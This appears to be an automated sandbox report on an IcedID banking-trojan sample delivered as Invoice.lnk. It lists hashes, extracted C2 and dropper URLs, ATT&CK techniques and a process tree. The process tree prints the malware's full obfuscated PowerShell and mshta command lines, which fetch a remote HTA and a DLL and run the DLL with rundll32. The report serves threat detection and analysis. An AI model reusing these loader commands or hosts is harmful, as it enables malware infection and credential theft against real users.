icedid | d84858759a5c581373e2f2fe85fa155a3a6cfe55da68df33cfdc7be28c184fcc

General

Target

Invoice.lnk
Size

168KB
MD5

edbd1edc29cbffb556ce1f114cce26b0
SHA1

272d13aacab4f01bef6291bdc6cadfa1056d7487
SHA256

6dedf3cf1241a2db9515459013693dc05dcb0538f99a99aa894a1cd822bac040
SHA512

001efa270ffd6cdb9223a34749f9f6c840efa2a4cfe226ed12cf2941c13b94da3e7ae3e60189f6f89a1bb2c5756b3657335a8fad916e4bbb04cd616d11b4a2d6

Score

10^/10

icedid 1487191074 banker loader suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://comradespoon.com/2h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

6 2112 mshta.exe
15 3456 powershell.exe
22 3428 rundll32.exe
Downloads MZ/PE file

flow	pid	process
6	2112	mshta.exe
15	3456	powershell.exe
22	3428	rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3428 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exerundll32.exe

pid process

3980 powershell.exe
3980 powershell.exe
3456 powershell.exe
3456 powershell.exe
3428 rundll32.exe
3428 rundll32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3980 powershell.exe
Token: SeDebugPrivilege 3456 powershell.exe

pid	process
3428	rundll32.exe

pid	process
3980	powershell.exe
3980	powershell.exe
3456	powershell.exe
3456	powershell.exe
3428	rundll32.exe
3428	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exe

description	pid	process	target process
PID 1072 wrote to memory of 3980	1072	cmd.exe	powershell.exe
PID 1072 wrote to memory of 3980	1072	cmd.exe	powershell.exe
PID 3980 wrote to memory of 2112	3980	powershell.exe	mshta.exe
PID 3980 wrote to memory of 2112	3980	powershell.exe	mshta.exe
PID 2112 wrote to memory of 3456	2112	mshta.exe	powershell.exe
PID 2112 wrote to memory of 3456	2112	mshta.exe	powershell.exe
PID 3456 wrote to memory of 3428	3456	powershell.exe	rundll32.exe
PID 3456 wrote to memory of 3428	3456	powershell.exe	rundll32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $UyNmTVCg = [convert]::FromBase64String('PjIv');$OikXNBFJ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYRR9ZHwMW');$krHNYSsX = -join($UyNmTVCg | % {[char] ($_ -bxor 0x77)});$QOdPilEN = -join ($OikXNBFJ | % { [char] ($_ -bxor 0x77)});sal mUkqunnT $krHNYSsX;mUkqunnT $QOdPilEN
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://comradespoon.com/2h.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function rZwKXSy($rOzLm, $DUeaQm){[IO.File]::WriteAllBytes($rOzLm, $DUeaQm)};function htljZbMQ($rOzLm){if($rOzLm.EndsWith((xoyDjKbWstoV @(72795,72849,72857,72857))) -eq $True){Start-Process (xoyDjKbWstoV @(rundll32.exe $rOzLm ,PluginInit ))}elseif($rOzLm.EndsWith((xoyDjKbWstoV @(72795,72861,72864,72798))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rOzLm}else{Start-Process $rOzLm}};function SiBubiCtqgxPeNJqDKD($rZwKXSy){$eGKnYJkKmOtohKYR=(xoyDjKbWstoV @(72821,72854,72849,72849,72850,72859));$hFlgyECaMBiw=(Get-ChildItem $rZwKXSy -Force);$hFlgyECaMBiw.Attributes=$hFlgyECaMBiw.Attributes -bor ([IO.FileAttributes]$eGKnYJkKmOtohKYR).value__};function iGSkurIwFCeyKNPHoI($zVxGUJsKPALgckmv){$EbaApiTPKvKzt = New-Object (xoyDjKbWstoV @(72827,72850,72865,72795,72836,72850,72847,72816,72857,72854,72850,72859,72865));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DUeaQm = $EbaApiTPKvKzt.DownloadData($zVxGUJsKPALgckmv);return $DUeaQm};function xoyDjKbWstoV($WvTikuTXb){$lJrjbHlZ=72749;$atMOIng=$Null;foreach($nSQChvZytQtFryr in $WvTikuTXb){$atMOIng+=[char]($nSQChvZytQtFryr-$lJrjbHlZ)};return $atMOIng};function qSYcqRJFG(){$LelVRnfNHnvRdRpfMKy = $env:ProgramData + '\';$IvwEdTB = $LelVRnfNHnvRdRpfMKy + '2.dll'; if (Test-Path -Path $IvwEdTB){htljZbMQ $IvwEdTB;}Else{ $kfGWL = iGSkurIwFCeyKNPHoI (xoyDjKbWstoV @(72853,72865,72865,72861,72807,72796,72796,72848,72860,72858,72863,72846,72849,72850,72864,72861,72860,72860,72859,72795,72848,72860,72858,72796,72799,72795,72849,72857,72857));rZwKXSy $IvwEdTB $kfGWL;htljZbMQ $IvwEdTB;};SiBubiCtqgxPeNJqDKD $IvwEdTB;;;;;}qSYcqRJFG;
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\ProgramData\2.dll PluginInit
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\2.dll

Filesize
813KB

MD5
25d1234dd9cf6e381a71f3af53897cda

SHA1
c34b42afaab68851deb4fe169ddc602106ea7869

SHA256
6ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3

SHA512
ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a

Download Submit
C:\ProgramData\2.dll

Filesize
813KB

MD5
25d1234dd9cf6e381a71f3af53897cda

SHA1
c34b42afaab68851deb4fe169ddc602106ea7869

SHA256
6ab4c37872c4b1ca57ba2f2226f5565b726d4db2128ed50c0a3a3e9a7d7888b3

SHA512
ddb19f8e1486a68e4d00bfbfcdd11cf183382d5c7171a8d83bce92b48c71c1338cb25d9da3b27dc22e6bdc7e196bc88db8e1172db4a170b2b299f852ada0865a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b591dabf3d165412ca5160b0fc9f7a0

SHA1
7f4003f64d280a98099a799b7303ab94adfea747

SHA256
d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60

SHA512
57aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5

Download Submit
memory/2112-132-0x0000000000000000-mapping.dmp

Download
memory/3428-139-0x0000000000000000-mapping.dmp

Download
memory/3428-144-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3456-135-0x0000000000000000-mapping.dmp

Download
memory/3456-138-0x00007FFCB5E70000-0x00007FFCB6931000-memory.dmp

Filesize
10.8MB

Download
memory/3456-142-0x00007FFCB5E70000-0x00007FFCB6931000-memory.dmp

Filesize
10.8MB

Download
memory/3980-133-0x00007FFCB6C60000-0x00007FFCB7721000-memory.dmp

Filesize
10.8MB

Download
memory/3980-130-0x0000000000000000-mapping.dmp

Download
memory/3980-131-0x00000295D60B0000-0x00000295D60D2000-memory.dmp

Filesize
136KB

Download
memory/3980-143-0x00007FFCB6C60000-0x00007FFCB7721000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads